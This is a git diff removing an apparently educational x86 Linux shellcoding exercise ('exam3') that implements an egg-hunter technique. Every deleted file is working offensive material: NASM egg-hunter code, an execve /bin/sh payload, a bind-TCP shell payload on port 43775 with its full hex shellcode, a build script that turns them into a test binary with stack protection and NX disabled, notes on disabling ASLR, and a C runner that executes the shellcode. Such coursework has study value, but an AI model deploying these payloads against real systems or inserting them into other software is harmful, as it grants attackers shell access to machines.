diff --git a/exam3/NOTES b/exam3/NOTES
deleted file mode 100644
index 088dd00..0000000
--- a/exam3/NOTES
+++ /dev/null
@@ -1,11 +0,0 @@
-NOTES
-
- no-stack-protector: disables GCC Stack-Smashing Protector (SSP), aka ProPolice
-
- execstack: disables Executable space protection (NX).
- Or Data Execution Prevention (DEP) on Windows,
- or Write XOR Execute (W^X) on BSD.
- CPU’s NX bit ("Never eXecute").
-
- To disalbe Address Space Layout Randomization (ASLR) when running binary
- setarch `arch` -R ./program
diff --git a/exam3/USAGE b/exam3/USAGE
deleted file mode 100644
index e2492b0..0000000
--- a/exam3/USAGE
+++ /dev/null
@@ -1,32 +0,0 @@
-USAGE
-
-1. Prepare your payload in payload.nasm file or you can directly specify it in make.sh script (PAYLOADCODE= variable)
-
-I'm using a symlink as follows
-
-exam3$ ln -svf payload-execve-stack.nasm payload.nasm
-`payload.nasm' -> `payload-execve-stack.nasm'
-
-
-2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
-
-exam3$ ./make.sh "egg.MaRk"
- [I] Using custom EGG mark: egg.MaRk
- [+] Compiling payload.nasm ...
- [+] Compiling hunter.nasm ...
- [+] Extracting PAYLOAD code from payload ...
- [+] Adding EGG mark to PAYLOAD ...
- [+] Checking PAYLOAD code for NULLs ...
- [+] Extracting HUNTER code from hunter ...
- [+] Checking HUNTER code for NULLs ...
- [+] Compiling shellcode.c ...
--rwx------. 1 arno arno 5100 Mar 27 17:02 ./shellcode
- [+] All done!
-
-
-3. Run the shellcode
-
-exam3$ ./shellcode
-Hunter Length: 21
-Payload Length: 36
-sh-4.1$
diff --git a/exam3/egghunter.nasm b/exam3/egghunter.nasm
deleted file mode 100644
index 90b829a..0000000
--- a/exam3/egghunter.nasm
+++ /dev/null
@@ -1,79 +0,0 @@
-; This program is free software: you can redistribute it and/or modify
-; it under the terms of the GNU General Public License as published by
-; the Free Software Foundation, either version 3 of the License, or
-; (at your option) any later version.
-;
-; This program is distributed in the hope that it will be useful,
-; but WITHOUT ANY WARRANTY; without even the implied warranty of
-; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-; GNU General Public License for more details.
-;
-; You should have received a copy of the GNU General Public License
-; along with this program. If not, see .
-;
-;
-; Filename: egghunter.nasm
-; Author: Andrey Arapov
-; 2013 March
-;
-;
-
-section .data
- egg1 equ "Egg-" ; DWORD Egg marker part1
- egg2 equ "Mark" ; DWORD Egg marker part2
-
-
-section .text
-global _start
-
-
-_start:
- jmp short EggPoint
-
-continue:
- pop eax
-
- ; Searching for the Egg marker
-next:
- inc eax ; Searching backwards
-isEgg:
- cmp dword [eax-8], egg1
- jne next
- cmp dword [eax-4], egg2
- jne next
- call eax
-
- ; EXIT
- xor eax, eax
- mov al, 1
- xor ebx, ebx
- int 0x80
-
-EggPoint:
- call continue
-
-Egg:
- db "Egg-Mark" ; QWORD egg marker
-
- ; loop counter = 8
- xor ecx, ecx
- mov cl, 8
-decloop:
- dec eax
- loop decloop
-
- mov ecx, eax
- xor edx, edx
- mov dl, 8
- xor eax, eax
- mov al, 4
- xor ebx, ebx
- mov bl, 1
- int 0x80
-
- xor eax, eax
- mov al, 1
- xor ebx, ebx
- int 0x80
-
-
diff --git a/exam3/hunter.nasm b/exam3/hunter.nasm
deleted file mode 100644
index da46f05..0000000
--- a/exam3/hunter.nasm
+++ /dev/null
@@ -1,40 +0,0 @@
-; This program is free software: you can redistribute it and/or modify
-; it under the terms of the GNU General Public License as published by
-; the Free Software Foundation, either version 3 of the License, or
-; (at your option) any later version.
-;
-; This program is distributed in the hope that it will be useful,
-; but WITHOUT ANY WARRANTY; without even the implied warranty of
-; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-; GNU General Public License for more details.
-;
-; You should have received a copy of the GNU General Public License
-; along with this program. If not, see .
-;
-;
-; Filename: hunter.nasm
-; Author: Andrey Arapov
-; 2013 March
-;
-;
-
-section .data
- egg1 equ "Egg-" ; DWORD Egg marker part1
- egg2 equ "Mark" ; DWORD Egg marker part2
-
-
-section .text
-global _start
-
-
-_start:
- ; Searching for the Egg marker
-next:
- inc eax ; Searching forward (can also try dec eax)
-isEgg:
- cmp dword [eax-8], egg1 ; Checking if we can see egg1
- jne next ; If not, continuing to search
- cmp dword [eax-4], egg2
- jne next
-
- call eax ; Once found, we call our payload
diff --git a/exam3/make.sh b/exam3/make.sh
deleted file mode 100755
index 00c5f73..0000000
--- a/exam3/make.sh
+++ /dev/null
@@ -1,130 +0,0 @@
-#!/usr/bin/env sh
-#
-# USAGE
-# ./make.sh [Egg-Mark]
-#
-# NOTE
-# Egg-Mark must be a plaintext with 8 bytes in length
-# If Egg-Mark was not specified, the default one will be used.
-#
-# To specify a custom payload, simply modify the code of payload.nasm file.
-# Alternativly, you can modify PAYLOADCODE= variable down below the code.
-#
-
-ARG1=$1
-
-if [ -z "$ARG1" ]; then
- echo " [I] Argument not specified. Using default EGG mark."
- ARG1="Egg-Mark";
-elif ! [[ `expr length $ARG1` -ge 8 && `expr length $ARG1` -le 8 ]]; then
- echo " [E] Custom EGG mark must be 8 bytes in length! Exiting."
- exit 1;
-else
- echo " [I] Using custom EGG mark: "$ARG1
-fi
-
-
-DEFAULTEGG=($(echo -n "Egg-Mark" | sed -e 's/\(....\)/\1\n/g')) # set in hunter.nasm
-EGGMARK=$ARG1
-NEWEGG=($(echo -n $EGGMARK | sed -e 's/\(....\)/\1\n/g'))
-
-# Uncomment to save EGGMARK in HEX
-EGGMARK=$(echo -n $ARG1 | od -A n -t x1 |sed 's/ /\\x/g')
-
-# Cleanup
-rm -f shellcode payload.o payload hunter.o hunter
-
-echo " [+] Compiling payload.nasm ..."
-nasm -f elf32 -o payload.o payload.nasm
-ld -m elf_i386 -o payload payload.o
-
-echo " [+] Compiling hunter.nasm ..."
-nasm -f elf32 -o hunter.o hunter.nasm
-ld -m elf_i386 -o hunter hunter.o
-
-echo " [+] Extracting PAYLOAD code from payload ..."
-PAYLOADCODE=$(objdump -d ./payload |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s)
-
-echo " [+] Adding EGG mark to PAYLOAD ..."
-FULL_PAYLOADCODE=$(echo -n ${EGGMARK}${PAYLOADCODE}|sed 's/^/"/' |sed 's/$/"/g')
-
-echo " [+] Checking PAYLOAD code for NULLs ..."
-if [[ $FULL_PAYLOADCODE == *00* ]]; then
- echo " [E] Your PAYLOAD code contains 00 (NULL) ! Exiting."
- exit 1
-fi
-
-
-echo " [+] Extracting HUNTER code from hunter ..."
-HUNTERCODE=$(objdump -d ./hunter |grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s|sed 's/^/"/' |sed 's/$/"/g')
-
-# For debugging only
-#echo ${DEFAULTEGG[0]}
-#echo ${DEFAULTEGG[1]}
-#echo ${NEWEGG[0]}
-#echo ${NEWEGG[1]}
-
-# Preparing Default egg to HEX form in order to replace it with a New egg
-DEFEGG1=$(echo -n ${DEFAULTEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
-DEFEGG2=$(echo -n ${DEFAULTEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
-
-# Uncomment to save new EGGMARK in HEX format
-NEWEGG1=$(echo -n ${NEWEGG[0]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
-NEWEGG2=$(echo -n ${NEWEGG[1]} | od -A n -t x1 |sed 's/ /\\x/g'|sed 's/\\/\\\\/g')
-
-# Uncomment to save new EGGMARK in Plaintext format
-#NEWEGG1=$(echo -n ${NEWEGG[0]})
-#NEWEGG2=$(echo -n ${NEWEGG[1]})
-
-
-FULL_HUNTERCODE=$(echo -n $HUNTERCODE |sed 's/'$DEFEGG1'/'$NEWEGG1'/g'| sed 's/'$DEFEGG2'/'$NEWEGG2'/g')
-
-echo " [+] Checking HUNTER code for NULLs ..."
-if [[ $FULL_HUNTERCODE == *00* ]]; then
- echo " [E] Your HUNTER code contains 00 (NULL) ! Exiting."
- exit 1
-fi
-
-
-# Uncomment to see what will is replaced (default egg with a new one)
-#echo $DEFEGG1
-#echo $DEFEGG2
-#echo $NEWEGG1
-#echo $NEWEGG2
-#echo $HUNTERCODE
-#echo $FULL_HUNTERCODE
-
-cat > shellcode.c << EOF
-#include
-#include
-
-unsigned char hunter[] = \
-$FULL_HUNTERCODE;
-
-unsigned char garbage1[] = \
-"Just some garbage here...";
-
-unsigned char payload[] = \
-$FULL_PAYLOADCODE;
-
-unsigned char garbage2[] = \
-"And some garbage there...";
-
-main()
-{
- printf("Hunter Length: %d\n", strlen(hunter));
- printf("Payload Length: %d\n", strlen(payload));
- int (*ret)() = (int(*)())hunter;
- ret();
-}
-EOF
-
-echo " [+] Compiling shellcode.c ..."
-gcc -m32 -fno-stack-protector -z execstack shellcode.c -o shellcode
-
-# Cleanup
-rm -f payload.o payload hunter.o hunter
-
-ls -la ./shellcode
-
-echo " [+] All done!"
diff --git a/exam3/payload-execve-stack.nasm b/exam3/payload-execve-stack.nasm
deleted file mode 100644
index 1ab23b8..0000000
--- a/exam3/payload-execve-stack.nasm
+++ /dev/null
@@ -1,44 +0,0 @@
-; This program is free software: you can redistribute it and/or modify
-; it under the terms of the GNU General Public License as published by
-; the Free Software Foundation, either version 3 of the License, or
-; (at your option) any later version.
-;
-; This program is distributed in the hope that it will be useful,
-; but WITHOUT ANY WARRANTY; without even the implied warranty of
-; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-; GNU General Public License for more details.
-;
-; You should have received a copy of the GNU General Public License
-; along with this program. If not, see .
-
-; Filename: payload-execve-stack.nasm
-; Author: Andrey Arapov
-; 2013 March
-
-global _start
-
-
-section .text
-
-_start:
- ; EAX
- xor eax, eax
- mov al, 11 ; execve syscall
-
- ; EBX
- xor edx, edx
- push edx ; NULL termination of '//bin/sh' string
- push 0x68732f6e ; '//bin/sh' in reverse
- push 0x69622f2f ; beginning of '//bin/sh' string is here
- mov ebx, esp ; put the address of '//bin/sh' into ebx via esp
-
- ; ECX
- push edx ; NULL termination of a stack
- push ebx ; load our '//bin/sh' on a stack
- mov ecx, esp ; ECX is a PTR to stack where we've got EBX address to '//bin/sh' string.
-
- ; EDX
- push edx ; NULL terminator
- mov edx, esp ; EDX is a PTR to a stack which has an address to NULL.
- int 0x80
-
diff --git a/exam3/payload-shell_bind_tcp_smaller.nasm b/exam3/payload-shell_bind_tcp_smaller.nasm
deleted file mode 100644
index 7eae9b0..0000000
--- a/exam3/payload-shell_bind_tcp_smaller.nasm
+++ /dev/null
@@ -1,113 +0,0 @@
-; This program is free software: you can redistribute it and/or modify
-; it under the terms of the GNU General Public License as published by
-; the Free Software Foundation, either version 3 of the License, or
-; (at your option) any later version.
-;
-; This program is distributed in the hope that it will be useful,
-; but WITHOUT ANY WARRANTY; without even the implied warranty of
-; MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
-; GNU General Public License for more details.
-;
-; You should have received a copy of the GNU General Public License
-; along with this program. If not, see .
-;
-;
-; Filename: payload-shell_bind_tcp_smaller.nasm
-; Author: Andrey Arapov
-; 2013 March
-;
-; DESC:
-; - Binds to a port 43775
-; - Execs Shell on incoming connection
-;
-;
-; Shellcode size: 108 bytes
-; Shellcode "\x31\xc0\xb0\x66\x31\xdb\x43\x6a\x06\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x89\xc6\xeb\x50\x5f\x6a\x66\x58\x43\x31\xd2\x52\x66\xff\x37\x66\x53\x89\xe1\x6a\x10\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x6a\x01\x56\x89\xe1\xcd\x80\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80\xe8\xab\xff\xff\xff\xaa\xff"
-;
-; Port is the last two bytes of the shellcode. In hex \xaa\xff (0xaaff = 43775)
-;
-;
-
-global _start
-
-section .text
-
-_start:
- xor eax, eax
- mov al, 102 ; socketcall
- xor ebx, ebx
- inc ebx ; 1 = SYS_SOCKET socket()
- push BYTE 6 ; IPPROTO_TCP || int protocol);
- push BYTE 1 ; SOCK_STREAM || int type,
- push BYTE 2 ; AF_INET || socket(int domain,
- mov ecx, esp ; ECX - PTR to arguments for socket()
- int 0x80
- mov esi, eax ; save socket fd in ESI for later
-
-
- jmp short call_get_port
-port_in_esp:
- pop edi ; getting port address from ESP
-
- push BYTE 102
- pop eax ; socketcall
- inc ebx ; 2 = SYS_BIND bind()
- xor edx, edx
- push edx ; 0 = ANY HOST (0.0.0.0)} || struct in_addr sin_addr (unsigned long s_addr) };
- push WORD [edi] ; PORT specified in the bottom of the code / shellcode. Last two bytes in HEX.
- push WORD bx ; 2 = AF_INET || struct sockaddr { short sin_family,
- mov ecx, esp ; Save PTR to sockaddr struct in ECX
- push BYTE 16 ; socklen_t addrlen);
- push ecx ; const struct sockaddr *addr,
- push esi ; bind(int sockfd,
- mov ecx, esp ; ECX = PTR to arguments for bind()
- int 0x80
-
-
- mov BYTE al, 102 ; socketcall
- inc ebx
- inc ebx ; 4 = SYS_LISTEN listen()
- push BYTE 1 ; int backlog);
- push esi ; listen(int sockfd,
- mov ecx, esp ; ECX = PTR to arguments for listen()
- int 0x80
-
-
- mov BYTE al, 102 ; socketcall
- inc ebx ; 5 = SYS_ACCEPT = accept()
- push edx ; socklen_t *addrlen = 0);
- push edx ; struct sockaddr *addr = NULL,
- push esi ; listen(int sockfd,
- mov ecx, esp ; ECX = PTR to arguments for accept()
- int 0x80
-
-
- ; dup2 to duplicate sockfd, that will attach the client to a shell
- ; that we'll spawn below in execve syscall
- xchg eax, ebx ; after EBX = sockfd, EAX = 5
- push BYTE 2
- pop ecx
-dup2_loop:
- mov BYTE al, 63
- int 0x80
- dec ecx
- jns dup2_loop
-
-
- ; spawning as shell
- xor eax, eax
- push eax
- push 0x68732f6e ; '//bin/sh' in reverse
- push 0x69622f2f ; beginning of '//bin/sh' string is here
- mov ebx, esp
- push eax
- mov edx, esp ; ESP is now pointing to EDX
- push ebx
- mov ecx, esp
- mov al, 11 ; execve
- int 0x80
-
-call_get_port:
- call port_in_esp
- db 0xaa, 0xff ; BYTE (43775 in straight hex)
-
diff --git a/exam3/payload.nasm b/exam3/payload.nasm
deleted file mode 120000
index 5ba03e3..0000000
--- a/exam3/payload.nasm
+++ /dev/null
@@ -1 +0,0 @@
-payload-execve-stack.nasm
\ No newline at end of file
diff --git a/exam3/shellcode.c b/exam3/shellcode.c
deleted file mode 100644
index feaf2d7..0000000
--- a/exam3/shellcode.c
+++ /dev/null
@@ -1,18 +0,0 @@
-#include
-#include
-
-unsigned char hunter[] = "\x40\x81\x78\xf8\x65\x67\x67\x2e\x75\xf6\x81\x78\xfc\x4d\x61\x52\x6b\x75\xed\xff\xd0";
-
-unsigned char garbage1[] = "Just some garbage here...";
-
-unsigned char payload[] = "\x65\x67\x67\x2e\x4d\x61\x52\x6b\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
-
-unsigned char garbage2[] = "And some garbage there...";
-
-main()
-{
- printf("Hunter Length: %d\n", strlen(hunter));
- printf("Payload Length: %d\n", strlen(payload));
- int (*ret)() = (int(*)())hunter;
- ret();
-}